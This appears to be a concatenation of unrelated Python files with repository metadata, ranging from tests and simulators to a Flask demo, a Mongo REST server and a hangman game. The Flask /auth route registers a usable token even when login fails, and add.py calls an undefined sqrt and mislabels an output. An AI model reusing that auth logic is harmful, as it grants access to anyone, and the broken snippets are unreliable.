cls.activation_reader = ActivationReader(activations_dir=ACTIVATIONS_DIR)
@classmethod
def tearDownClass(cls) -> None:
# Remove files from previous tests
if os.listdir(ACTIVATIONS_DIR):
shutil.rmtree(ACTIVATIONS_DIR)
def test_read_activations(self) -> None:
""" Test reading activations from a pickle file. """
activations = self.activation_reader.read_activations((0, "hx"))
# Check if the amount of read data is correct
self.assertEqual(
self.activation_reader.data_len,
activations.shape[0],
"Number of read activations is wrong.",
)
# Check how many sentences were processed
# The first activation of a dummy sentence is a vector of ones
start_of_sentences = activations[:, 0] == 1
num_read_sentences = start_of_sentences.sum()
self.assertEqual(
NUM_TEST_SENTENCES, num_read_sentences, "Number of read sentences is wrong"
)
def test_activation_indexing(self) -> None:
first_idx = list(self.activation_reader.activation_ranges.keys())[0]
def seq_shapes(tensors: Sequence[Tensor]) -> List[Sequence[int]]:
shapes = map(lambda t: tuple(t.shape), tensors)
return list(shapes)
self.assertEqual(
seq_shapes(
self.activation_reader[0, {"indextype": "pos", "a_name": (0, "hx")}]
),
seq_shapes(
self.activation_reader[
first_idx, {"indextype": "key", "a_name": (0, "hx")}
]
),
"Activation shape of first sentence not equal by position/key indexing",
)
self.assertEqual(
seq_shapes(self.activation_reader[0:]),
seq_shapes(
self.activation_reader[slice(0, None, None), {"indextype": "key"}]
),
"Indexing all activations by key and position yields different results",
)
self.assertEqual(
seq_shapes(self.activation_reader[0]),
seq_shapes(self.activation_reader[first_idx, {"indextype": "key"}]),
"Activation shape of first sentence not equal by position/key indexing",
)
data_len = self.activation_reader.data_len
ashape = self.activation_reader[
slice(0, data_len // 2, None), {"indextype": "all"}
][0].shape
self.assertTrue(
ashape == (data_len // 2, ACTIVATIONS_DIM),
f"Indexing by all activations is not working: {ashape}",
)
def test_activation_ranges(self) -> None:
self.assertEqual(
sum(
ma - mi for mi, ma in self.activation_reader.activation_ranges.values()
),
self.activation_reader.data_len,
"Length mismatch activation ranges and label length of ActivationReader",
)
| true
|
5a0bd5c8cbd020458c635a046df3e723c22d6406
|
Python
|
jmgraeffe/ieee802-11-simplified-mac-simulator
|
/simulation/__init__.py
|
UTF-8
| 3,732
| 2.90625
| 3
|
[
"MIT"
] |
permissive
|
from enum import Enum
from multiprocessing import cpu_count, Pool
import logging
import collections
import time
class Scheme(Enum):
DCF_BASIC = 1
DCF_NO_BACKOFF_MEMORY = 2
DCF_GLOBAL_CW = 3
    CRB = 4  # trailing comma removed; it made the enum value a one-element tuple
TBRI = 5 # 3bRI, 3 bit of reservation information, three bit scheduling
@classmethod
def to_human_name(cls, scheme):
if scheme is cls.DCF_BASIC:
return 'DCF'
elif scheme is cls.CRB:
return 'CRB'
elif scheme is cls.TBRI:
return '3bRI'
else:
return str(scheme)
def run(scheme=Scheme.DCF_BASIC, num_stations=50, num_iterations=1000, cw_start=15, cw_end=255):
if scheme is Scheme.DCF_BASIC:
from .schemes.dcf_basic import Simulator
# elif scheme is Scheme.DCF_NO_BACKOFF_MEMORY:
# from .schemes.dcf_nobackoffmemory import Simulator
# elif scheme is Scheme.DCF_GLOBAL_CW:
# from .schemes.dcf_globalcw import Simulator
elif scheme is Scheme.CRB:
from .schemes.crb import Simulator
elif scheme is Scheme.TBRI:
        from .schemes.tbri import Simulator
else:
logging.error('Scheme \'{}\' not implemented!'.format(scheme))
return
simulation = Simulator(num_stations, num_iterations, cw_start, cw_end).run()
logging.info('-' * 64)
logging.info('collisions_ap\t\t\t\t= {}'.format(simulation.collisions_ap))
logging.info('collisions_stations\t\t\t= {}'.format(simulation.collisions_stations))
logging.info('successful_transmissions\t= {}'.format(simulation.successful_transmissions))
logging.info('-' * 64)
return simulation
def run_process(args):
return run(*args)
def run_multiple(range_iterations, schemes, range_stations, cw_start=15, cw_end=255):
simulations = collections.OrderedDict()
process_args = []
for num_iterations in range_iterations:
simulations[num_iterations] = collections.OrderedDict()
for scheme in schemes:
simulations[num_iterations][scheme] = collections.OrderedDict()
for num_stations in range_stations:
process_args.append((scheme, num_stations, num_iterations, cw_start, cw_end))
with Pool(processes=int(3 * cpu_count() / 4)) as pool:
results = pool.map(run_process, process_args)
for result in results:
simulations[result.num_iterations][result.scheme][result.num_stations] = result
return simulations
def run_multiple_averaged(num_simulations, range_iterations, schemes, range_stations, cw_start=15, cw_end=255):
start = time.time()
first = run_multiple(range_iterations, schemes, range_stations, cw_start, cw_end)
end = time.time()
print("1. simulation finished in {} seconds!".format(end - start))
# add statistics of all missing simulations to the first one
for num_simulation in range(num_simulations - 1):
start = time.time()
simulations = run_multiple(range_iterations, schemes, range_stations, cw_start, cw_end)
end = time.time()
print("{}. simulation finished in {} seconds!".format(num_simulation + 2, end - start))
for num_iterations, simulations1 in simulations.items():
for scheme, simulations2 in simulations1.items():
for num_stations, simulation in simulations2.items():
first[num_iterations][scheme][num_stations].add(simulation)
# divide everything to get average
for num_iterations, simulations1 in first.items():
for scheme, simulations2 in simulations1.items():
for num_stations, simulation in simulations2.items():
first[num_iterations][scheme][num_stations].divide_by(num_simulations)
return first
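# --- Added usage sketch (not in the original module): the parameter values
# below are arbitrary examples, shown commented out because a real run
# dispatches the scheme simulators and can take a while.
# results = run_multiple_averaged(
#     num_simulations=3,
#     range_iterations=[1000],
#     schemes=[Scheme.DCF_BASIC, Scheme.CRB],
#     range_stations=range(10, 60, 10),
# )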
| true
|
9471161cd0bef6ac1008befc01ab0cbc5730ea51
|
Python
|
eyurtsev/kor
|
/tests/test_type_descriptors.py
|
UTF-8
| 3,023
| 2.96875
| 3
|
[
"MIT"
] |
permissive
|
import pytest
from kor import Number, Object, Text
from kor.nodes import Bool, Option, Selection
from kor.type_descriptors import BulletPointDescriptor, TypeScriptDescriptor
OPTION_1 = Option(id="blue", description="Option Description", examples=["blue"])
OPTION_2 = Option(id="red", description="Red color", examples=["red"])
NUMBER = Number(
id="number", description="Number Description", examples=[("number", "2")]
)
TEXT = Text(id="text", description="Text Description", examples=[("text", "3")])
BOOL = Bool(id="bool", description="Bool Description", examples=[("bool", True)])
SELECTION = Selection(
id="selection",
description="Selection Description",
options=[OPTION_1],
null_examples=["foo"],
)
SELECTION_2 = Selection(
id="selection2",
description="Selection2 Description",
options=[OPTION_1, OPTION_2],
null_examples=["foo"],
many=True,
)
OBJ = Object(
id="object",
description="Object Description",
examples=[("another number", {"number": "1"})],
attributes=[NUMBER, TEXT, SELECTION, SELECTION_2, BOOL],
)
def test_no_obvious_crashes() -> None:
"""Lightweight test to verify that we can generate type descriptions for nodes.
This test doesn't verify correctness, only that code doesn't crash!
"""
nodes_to_check = [OBJ]
descriptors = [TypeScriptDescriptor(), BulletPointDescriptor()]
for node in nodes_to_check:
# Verify that we can generate description
for descriptor in descriptors:
assert isinstance(descriptor.describe(node), str)
@pytest.mark.parametrize(
"node,description",
[
(
OBJ,
(
"* object: Object # Object Description\n"
"* number: Number # Number Description\n"
"* text: Text # Text Description\n"
"* selection: Selection # Selection Description\n"
"* selection2: Selection # Selection2 Description\n"
"* bool: Bool # Bool Description"
),
),
],
)
def test_bullet_point_descriptions(node: Object, description: str) -> None:
"""Verify bullet point descriptions."""
assert BulletPointDescriptor().describe(node) == description
@pytest.mark.parametrize(
"node,description",
[
(
OBJ,
(
"```TypeScript\n"
"\n"
"object: { // Object Description\n"
" number: number // Number Description\n"
" text: string // Text Description\n"
' selection: "blue" // Selection Description\n'
' selection2: Array<"blue" | "red"> // Selection2 Description\n'
" bool: boolean // Bool Description\n"
"}\n"
"```\n"
),
),
],
)
def test_typescript_description(node: Object, description: str) -> None:
"""Verify typescript descriptions."""
assert TypeScriptDescriptor().describe(node) == description
| true
|
e138fca39f8debc4be770733fc026b6c45b6b7f7
|
Python
|
etwuerschmidt/advent-of-code
|
/2019/Day_2/Puzzle_2/solution.py
|
UTF-8
| 1,340
| 3.453125
| 3
|
[] |
no_license
|
def find_inputs(filename):
ops = reset_ops(filename)
for noun in range(0, 100):
for verb in range(0, 100):
ops[1] = noun
ops[2] = verb
if parse_op_codes(ops) == 19690720:
return 100 * noun + verb
else:
ops = reset_ops(filename)
ops = reset_ops(filename)
print("No noun and verb found to return value 19690720.")
exit(1)
def parse_op_codes(ops):
for position in range(0, len(ops), 4):
if ops[position] == 99:
return ops[0]
elif ops[position] != 1 and ops[position] != 2:
print(
f"Parsing ops ({ops[position]}, {ops[position+1]}, {ops[position+2]}, {ops[position+3]})")
print(f"Unknown opcode {ops[position]} found.")
exit(1)
input_1 = ops[position+1]
input_2 = ops[position+2]
output = ops[position+3]
if ops[position] == 1:
ops[output] = ops[input_1] + ops[input_2]
elif ops[position] == 2:
ops[output] = ops[input_1] * ops[input_2]
return ops[0]
def reset_ops(filename):
with open(filename, 'r') as f:
ops = f.readline().split(',')
ops = [int(op) for op in ops]
return ops
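# --- Added sanity check (not in the original): the small program below is the
# worked example from the Advent of Code 2019 day 2 statement; position 0
# should end up as 3500 after the add and multiply opcodes run.
assert parse_op_codes([1, 9, 10, 3, 2, 3, 11, 0, 99, 30, 40, 50]) == 3500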
if __name__ == "__main__":
print(find_inputs('puzzle_input.txt'))
| true
|
bfc0f3fd2bcc34c52edaff63b4fe0e49e20c9753
|
Python
|
DataDog/datadog-api-client-python
|
/examples/v2/users/GetInvitation.py
|
UTF-8
| 516
| 2.5625
| 3
|
[
"Apache-2.0",
"BSD-3-Clause",
"MIT",
"MPL-2.0"
] |
permissive
|
"""
Get a user invitation returns "OK" response
"""
from os import environ
from datadog_api_client import ApiClient, Configuration
from datadog_api_client.v2.api.users_api import UsersApi
# the "user" has a "user_invitation"
USER_INVITATION_ID = environ["USER_INVITATION_ID"]
configuration = Configuration()
with ApiClient(configuration) as api_client:
api_instance = UsersApi(api_client)
response = api_instance.get_invitation(
user_invitation_uuid=USER_INVITATION_ID,
)
print(response)
| true
|
7294a89d0bb1bd9f243c7c9e36f4ac81beb8fb96
|
Python
|
code-verse/karate_demo
|
/simple_python_server_sample/app.py
|
UTF-8
| 842
| 2.671875
| 3
|
[] |
no_license
|
from flask import Flask, request, abort
from user import User
from authentication import Authentication
from uuid import uuid4
app = Flask(__name__)
tokens = []
@app.route('/')
def index():
return 'Server Up!'
@app.route('/user/<int:user_id>')
def show_user(user_id):
auth_token = request.headers.get('x-token')
print(auth_token)
print(tokens)
if auth_token not in tokens:
abort(401)
user_data = User(user_id, 'Mr. X', 'mr.x@email.com')
return user_data.to_json()
@app.route('/auth', methods=['POST'])
def auth():
data = request.get_json()
token = uuid4()
status = 'SUCCESS'
if data.get('username') != 'user_01':
status = 'FAILED'
auth_result = Authentication(token, status)
tokens.append(str(token))
return auth_result.to_json()
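# --- Added usage notes (not in the original): example requests against the
# routes above, assuming the default Flask dev server on port 5000.
#   curl -X POST http://localhost:5000/auth \
#        -H "Content-Type: application/json" -d '{"username": "user_01"}'
#   curl http://localhost:5000/user/1 -H "x-token: <token from /auth>"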
| true
|
7a74108d069a1f057784e02c9074591028cb3094
|
Python
|
JaideepBgit/MachinelearningModels
|
/supervised_learning_prediction.py
|
UTF-8
| 1,689
| 3.109375
| 3
|
[] |
no_license
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Tue Jul 14 13:17:47 2020
@author: Jaideep Bommidi
"""
"""
Idea on the accuracy of the model on validation set.
So first fit the model on the entire training dataset and make predictions on the validation dataset
"""
from pandas import read_csv
from pandas.plotting import scatter_matrix
from matplotlib import pyplot
from sklearn.model_selection import train_test_split
from sklearn.model_selection import cross_val_score
from sklearn.model_selection import StratifiedKFold
from sklearn.metrics import classification_report
from sklearn.metrics import confusion_matrix
from sklearn.metrics import accuracy_score
from sklearn.linear_model import LogisticRegression
from sklearn.tree import DecisionTreeClassifier
from sklearn.neighbors import KNeighborsClassifier
from sklearn.discriminant_analysis import LinearDiscriminantAnalysis
from sklearn.naive_bayes import GaussianNB
from sklearn.svm import SVC
url = "https://raw.githubusercontent.com/jbrownlee/Datasets/master/iris.csv"
names = ['sepal-length', 'sepal-width', 'petal-length', 'petal-width', 'class']
dataset = read_csv(url, names=names)
array = dataset.values
X = array[:,0:4]
y = array[:,4]
X_train, X_validation, Y_train, Y_validation = train_test_split(X,y, test_size=0.20,random_state=1)
model = SVC(gamma='auto')
model.fit(X_train, Y_train)
predictions = model.predict(X_validation)
"""
evaluate predictions
accuracy is 96.66% on the hold out dataset
confusion matrix - shows that three errors are made
"""
print(accuracy_score(Y_validation, predictions))
print(confusion_matrix(Y_validation, predictions))
print(classification_report(Y_validation, predictions))
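# --- Added sketch (not in the original): a quick way to compare this SVC with
# the other imported classifiers using 10-fold stratified cross-validation on
# the training split. The fold count and random_state are arbitrary choices.
candidates = [LogisticRegression(solver='liblinear'), KNeighborsClassifier(),
              DecisionTreeClassifier(), GaussianNB(), SVC(gamma='auto')]
for candidate in candidates:
    kfold = StratifiedKFold(n_splits=10, random_state=1, shuffle=True)
    scores = cross_val_score(candidate, X_train, Y_train, cv=kfold, scoring='accuracy')
    print(type(candidate).__name__, scores.mean(), scores.std())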
| true
|
c8bb2bfdeca4891e24549679c50b76f549a9c7ce
|
Python
|
KristiKovacs/ForFun
|
/quiz.py
|
UTF-8
| 711
| 4
| 4
|
[] |
no_license
|
score = 0
def check_guess(guess, answer):
global score
still_guess = True
attempt = 0
while still_guess and attempt <3:
if guess.lower() == answer.lower():
print('Correct!')
score += 1
still_guess = False
else:
if attempt <2:
guess = input("Sorry, try again")
attempt += 1
if attempt == 3:
print("The correct answer is " + answer)
guess1 = input("Which bear lives in the North Pole?")
check_guess(guess1, 'Polar Bear')
guess2 = input("Which animal is faster: cat or cheetah?")
check_guess(guess2, 'cheetah')
print("your score is " + str(score))
| true
|
18c8f6a41fca4b04fe9f90f2cca92dd728b14c16
|
Python
|
am401/ip_verify
|
/ip-verify.py
|
UTF-8
| 752
| 3.640625
| 4
|
[] |
no_license
|
import ipaddress
import re
while True:
try:
ip = input("Enter an IP address: ")
if re.search('/', ip):
if ipaddress.ip_network(ip):
print("The IP is a CIDR IP. {}".format(ip))
continue
elif ipaddress.ip_address(ip).is_loopback:
print("The IP address is a loopback address: {}".format(ip))
continue
elif ipaddress.ip_address(ip).is_private:
print("The IP address is a private IP: {}".format(ip))
continue
elif ipaddress.ip_address(ip):
print("The IP address is valid: {}".format(ip))
continue
except ValueError:
print("ValueERROR. The IP address is invalid")
continue
| true
|
bc3ae7aacabd5ceb9a93df3bb94cdf65d4d37ea1
|
Python
|
Prosen-Ghosh/Problem-Solving
|
/Python/Codewars-Get Nth Event Number.py
|
UTF-8
| 209
| 2.59375
| 3
|
[] |
no_license
|
def nth_even(n):
return 2 * n - 2
# TUTORIAL: https://www.khanacademy.org/math/algebra/x2f8bb11595b61c86:sequences/x2f8bb11595b61c86:constructing-arithmetic-sequences/v/finding-the-100th-term-in-a-sequence
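# --- Added examples (not part of the kata solution): the sequence starts at 0,
# so the n-th even number is 2*(n-1).
assert nth_even(1) == 0
assert nth_even(3) == 4
assert nth_even(100) == 198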
| true
|
7d4618d3753e262bd0c6814ee5417162990cc34f
|
Python
|
tzytammy/requests_unittest
|
/习题/求100内所有奇数的和(2500)/NO.1.py
|
UTF-8
| 60
| 3.234375
| 3
|
[] |
no_license
|
count = 0
for i in range(1, 100, 2):
    count += i
print(count)
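# --- Added check (not in the original): the sum of the first 50 odd numbers is
# 50**2, matching the expected value 2500 in the exercise name.
assert count == 50 ** 2 == 2500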
| true
|
bf405c7ef0fc4102386422d01a90ce491420a5b8
|
Python
|
scravy/abnf
|
/src/abnf/grammars/rfc5234.py
|
UTF-8
| 2,255
| 2.890625
| 3
|
[
"MIT"
] |
permissive
|
"""
This is the ABNF grammar, expressed in ABNF, plus the core rules.
Collected rules from RFC 5234
https://tools.ietf.org/html/rfc5234
"""
from ..parser import Rule as _Rule
from .misc import load_grammar_rules
@load_grammar_rules()
class Rule(_Rule):
"""Rule objects generated from ABNF in RFC 4647."""
grammar = [
"rulelist = 1*( rule / (*c-wsp c-nl) )",
"rule = rulename defined-as elements c-nl\
; continues if next line starts\
; with white space",
'rulename = ALPHA *(ALPHA / DIGIT / "-")',
'defined-as = *c-wsp ("=" / "=/") *c-wsp\
; basic rules definition and\
; incremental alternatives',
"elements = alternation *c-wsp",
"c-wsp = WSP / (c-nl WSP)",
"c-nl = comment / CRLF\
; comment or newline",
'comment = ";" *(WSP / VCHAR) CRLF',
'alternation = concatenation\
*(*c-wsp "/" *c-wsp concatenation)',
"concatenation = repetition *(1*c-wsp repetition)",
"repetition = [repeat] element",
'repeat = 1*DIGIT / (*DIGIT "*" *DIGIT)',
"element = rulename / group / option /\
char-val / num-val",
'group = "(" *c-wsp alternation *c-wsp ")"',
'option = "[" *c-wsp alternation *c-wsp "]"',
"char-val = DQUOTE *(%x20-21 / %x23-7E) DQUOTE\
; quoted string of SP and VCHAR\
; without DQUOTE",
'num-val = "%" (bin-val / dec-val / hex-val)',
'bin-val = "b" 1*BIT\
[ 1*("." 1*BIT) / ("-" 1*BIT) ]\
; series of concatenated bit values\
; or single ONEOF range',
'dec-val = "d" 1*DIGIT\
[ 1*("." 1*DIGIT) / ("-" 1*DIGIT) ]',
'hex-val = "x" 1*HEXDIG\
[ 1*("." 1*HEXDIG) / ("-" 1*HEXDIG) ]\
; white space',
]
| true
|
f770b337c4d242e45749ae34d09bee8dc014f440
|
Python
|
VOIDS-dev/Advanced-Learning-Lab
|
/correspondingproject/HellowWorld.py
|
UTF-8
| 1,592
| 2.75
| 3
|
[] |
no_license
|
import sys,getopt,random
from inputTools import userInput
from inputTools import sampleInput
from outputTools import outputResult
from learningTools import simpleLearning
if __name__ == '__main__':
opts,args = getopt.getopt(sys.argv[1:], "i:o:")
inputFile = ""
outputFile = ""
trainingFile = 'data/training'
for op,value in opts:
if op == "-i":
inputFile = value
if op == "-o":
outputFile = value
print(inputFile,outputFile,trainingFile)
users = userInput(inputFile)
samples = sampleInput(trainingFile)
print("Samples Done!")
classifier = simpleLearning(samples)
print("Classifier Done!")
for user in users:
user.age = classifier[0]
if user.age <= 24:
user.age_group = "xx-24"
if user.age > 24 and user.age < 34:
user.age_group = "25-34"
if user.age > 34 and user.age <= 49:
user.age_group = "35-49"
if user.age > 49:
user.age_group = "49-xx"
user.genderType = classifier[1]
        # `random` here is the module itself, which is not callable; assuming a
        # uniform draw in [0, 1) and a random integer from 1 to 5 were intended.
        if random.random() >= user.genderType:
            user.gender = "female"
        else:
            user.gender = "male"
        para = random.randint(1, 5)
user.open = classifier[2]*para/5
user.conscientious = classifier[3]*para/5
user.extrovert = classifier[4]*para/5
user.agreeable = classifier[5]*para/5
user.neurotic = classifier[6]*para/5
outputResult(user,outputFile)
pass
| true
|
2385ea78cd2dc41c5aba0b4ebed3c20fe0367f5f
|
Python
|
jerbridges/Artifact-3
|
/rest_server_final.py
|
UTF-8
| 2,551
| 2.6875
| 3
|
[] |
no_license
|
#!/usr/bin/python
# Jeremy Bridges
# CS 340
# 4/14/2020
# CS 499
# updated 6/2/2020
import json
from bson import json_util
import bottle
from bottle import request, route
import datetime
from pymongo import MongoClient
# connect to database and collection
connection = MongoClient('localhost', 27017)
db = connection['market']
collection = db['stocks']
# setup URI paths for create stock REST service
# uses json from POST to create a new document in stocks collection
@bottle.route('/stocks/api/v1.0/createStock/', method='POST')
def add_document():
data = request.forms.get('data')
stock = request.forms.get("ticker")
if not data:
bottle.abort(400, 'No Data Received')
entity = json.loads(data)
ticker = {"Ticker": stock}
entity.update(ticker)
print(entity)
try:
collection.insert_one(entity)
except:
bottle.abort(400, 'Unable to add document')
return json.loads(json.dumps(entity, indent=4, default=json_util.default))
# setup URI paths for get stock REST service
# queries one document by ticker symbol and returns json document
@bottle.route('/stocks/api/v1.0/getStock/', method='GET')
def get_document():
stock = bottle.request.query.ticker
cursor = collection.find_one({'Ticker': stock})
if not cursor:
bottle.abort(404, 'No stock found')
return json.loads(json.dumps(cursor, indent=4, default=json_util.default))
# setup URI paths for updating document REST service
# queries document by ticker symbol and updates parameters from curl PUT command
@bottle.route('/stocks/api/v1.0/updateStock/', method=['POST'])
def update_document():
ticker = request.forms.get('ticker')
field = request.forms.get('field')
# value = request.forms.get('value')
if not field:
bottle.abort(400, 'No Data Received')
entity = json.loads(field)
cursor = collection.update_one({'Ticker': ticker}, {"$set": entity})
if not cursor:
bottle.abort(404, 'No document found')
return "{0} is has been updated with {1}\n".format(ticker, entity)
# setup URI paths for delete REST service
# deletes document queried by ticker symbol
@bottle.route('/stocks/api/v1.0/deleteStock/', method=['POST'])
def delete_document():
ticker = request.forms.get('ticker')
cursor = collection.remove({'Ticker': ticker})
if not cursor:
bottle.abort(404, 'No document found')
return "{0} is now removed\n".format(ticker)
if __name__ == '__main__':
# app.run(debug=True)
bottle.run(reloader=True, host='localhost', port=8080)
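# --- Added usage notes (not in the original): example curl calls against the
# routes above; the ticker and JSON payloads are placeholders.
#   curl "http://localhost:8080/stocks/api/v1.0/getStock/?ticker=AAPL"
#   curl -X POST http://localhost:8080/stocks/api/v1.0/createStock/ \
#        -d 'ticker=AAPL' -d 'data={"Price": 100}'
#   curl -X POST http://localhost:8080/stocks/api/v1.0/deleteStock/ -d 'ticker=AAPL'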
| true
|
ebf044dafc0f23f639e15f5a3184136eecf6766a
|
Python
|
jozuah/simplon_devcloud_jeu_pendu_python
|
/Pendu/script.py
|
UTF-8
| 5,509
| 3.40625
| 3
|
[] |
no_license
|
#!/usr/bin/env python3
import logging
from logging.handlers import RotatingFileHandler
# create the logger object we will use to write to the logs
logger = logging.getLogger()
def main():
    # set the logger level to DEBUG so that it records everything
logger.setLevel(logging.DEBUG)
    # create a formatter that will prepend the timestamp and the level
    # to every message written to the log
formatter = logging.Formatter('%(asctime)s :: %(levelname)s :: %(message)s')
    # create a handler that redirects log writes to a file
    # in 'append' mode, with 1 backup and a maximum size of 1 MB
file_handler = RotatingFileHandler('log.txt', 'a', 1000000, 1)
    # set its level to DEBUG, make it use the formatter created above,
    # and attach this handler to the logger
file_handler.setLevel(logging.DEBUG)
file_handler.setFormatter(formatter)
logger.addHandler(file_handler)
    ### Reset the log file
    my_txt_file = open("log.txt", "r+")
# to erase all data
my_txt_file.truncate()
# to close file
my_txt_file.close()
logger.info("Start log")
from random_words import RandomWords
rw = RandomWords()
my_word = rw.random_word()
error_count=0
test_letter=0
word_complete=0
max_error=5
my_word_empty=[]
my_letter=0
HANGMANPICS = ['''
+---+
| |
|
|
|
|
=========''', '''
+---+
| |
O |
|
|
|
=========''', '''
+---+
| |
O |
| |
|
|
=========''', '''
+---+
| |
O |
/| |
|
|
=========''', '''
+---+
| |
O |
/|\ |
|
|
=========''', '''
+---+
| |
O |
/|\ |
/ \ |
|
=========''']
    # Function that tests whether a letter occurs in a word
def test_letter_function(user_letter,game_word):
for i in game_word :
if i == user_letter:
logger.info("L'utilisateur a entré une lettre valide contenue dans le mot à trouver")
return 1
logger.info("L'utilisateur n'a pas entré une lettre contenue dans le mot à trouver")
return 0
    # Function that tests whether the word has been completely found
def test_full_word (my_current_list):
for item in my_current_list:
if item == '_':
logger.info("Le mot n'a pas été trouvé totalement")
return 0
logger.info("Le mot a été trouvé totalement")
return 1
    # Function that makes sure the user really entered a single letter
def test_true_letter():
while True:
my_user_letter = input("\n\nEntrer une lettre:")
logger.info("l'input de l'user est:")
logger.info(my_user_letter)
if len(my_user_letter)==1 :
if my_user_letter.isalpha():
logger.info("L'utilisateur a entré une lettre")
return my_user_letter
else:
print("Il faut vraiment entrer une lettre ...")
logger.info("L'utilisateur n'a pas entré une lettre'")
    # Initialise a list built from the word to find
my_word_as_list=list(my_word)
for i in range(len(my_word)):
my_word_empty.append('_')
    # Display the empty word and the gallows
print(HANGMANPICS[0])
for i in range(len(my_word)):
print("_ ", end='')
logger.info("le mot à trouver est:")
logger.info(my_word)
    ### THE GAME: LOOP THAT RUNS UNTIL THE PLAYER HAS MADE 5 ERRORS
    ### OR THE WORD HAS BEEN COMPLETELY FOUND
while (error_count < max_error) and (word_complete <1) :
my_letter = test_true_letter()
        # Check whether the user's letter occurs in the word
test_letter= test_letter_function(my_letter,my_word)
        # If NOT: add an error and draw the hangman
if(test_letter==0):
error_count = error_count + 1
print(my_letter, ": mauvais choix, %s/%s erreurs" %(error_count,max_error))
logger.info("Nombre d'erreurs actuel")
logger.info(error_count)
        # If YES: reveal the letter in the partially guessed word
elif(test_letter==1):
for compteur in range (len(my_word)):
if my_letter == my_word_as_list[compteur]:
my_word_empty[compteur] = my_word_as_list[compteur]
logger.info(my_word_empty)
        # Check whether the word is complete
word_complete = test_full_word(my_word_empty)
        # Display the word being guessed as a string
my_word_empty_str=' '.join(map(str,my_word_empty))
print(HANGMANPICS[error_count])
print(my_word_empty_str)
if error_count>= max_error:
print("\nJeu perdu")
logger.info("Jeu perdu")
logger.info("nombre d'erreurs :")
logger.info(error_count)
print("\nLe mot à trouver était :", my_word)
elif word_complete == 1 :
print("\nJeu gagné")
logger.info("Jeu gagné")
logger.info("mot initial :")
logger.info(my_word)
logger.info("mot trouvé :")
logger.info(my_word_empty_str)
logger.info("End log")
| true
|
9529c0570678ab2e97484bda769a54213f907685
|
Python
|
lexsteens/MSD-challenge
|
/code/head.py
|
UTF-8
| 467
| 2.828125
| 3
|
[] |
no_license
|
import sys, getopt
def main(argv):
inputfile = ''
n = 10
try:
opts, args = getopt.getopt(argv, "hn:")
except getopt.GetoptError:
print 'head.py -n <lines> file'
sys.exit(2)
for opt, arg in opts:
if opt == '-h':
print 'head.py -n <lines> file'
elif opt == '-n':
n = int(arg)
inputfile = args[0]
f_in = open(inputfile, 'r')
for i in range (0, n):
print(f_in.readline()),
f_in.close()
if __name__ == "__main__":
main(sys.argv[1:])
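# --- Added usage note (not in the original): e.g.
#   python head.py -n 5 somefile.txt
# prints the first 5 lines of somefile.txt (default is 10).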
| true
|
a7f4d942c08fed6f70922ac080b5670a6a6734ba
|
Python
|
ramanuj760/Python1
|
/add.py
|
UTF-8
| 503
| 3.84375
| 4
|
[] |
no_license
|
a=int(input("enter the first number:"))
b=int(input("enter the second number:"))
c=a+b
print("the addition of two numbers is",c)
d=a-b
print("the subtraction of two numbers is",d)
e=a*b
print("the multiplication of two numbers is",e)
f=a/b
print("the division of two numbers is",f)
g=a**b
print("b is power of a",a)
a+=1
print("it show increment in a",a)
h=sqrt(a)
print("square root of a",h)
i=a//b
print("it is floor division it shows integer quotent ",i)
j=a%b
print("remainder if b divide a ",j)
| true
|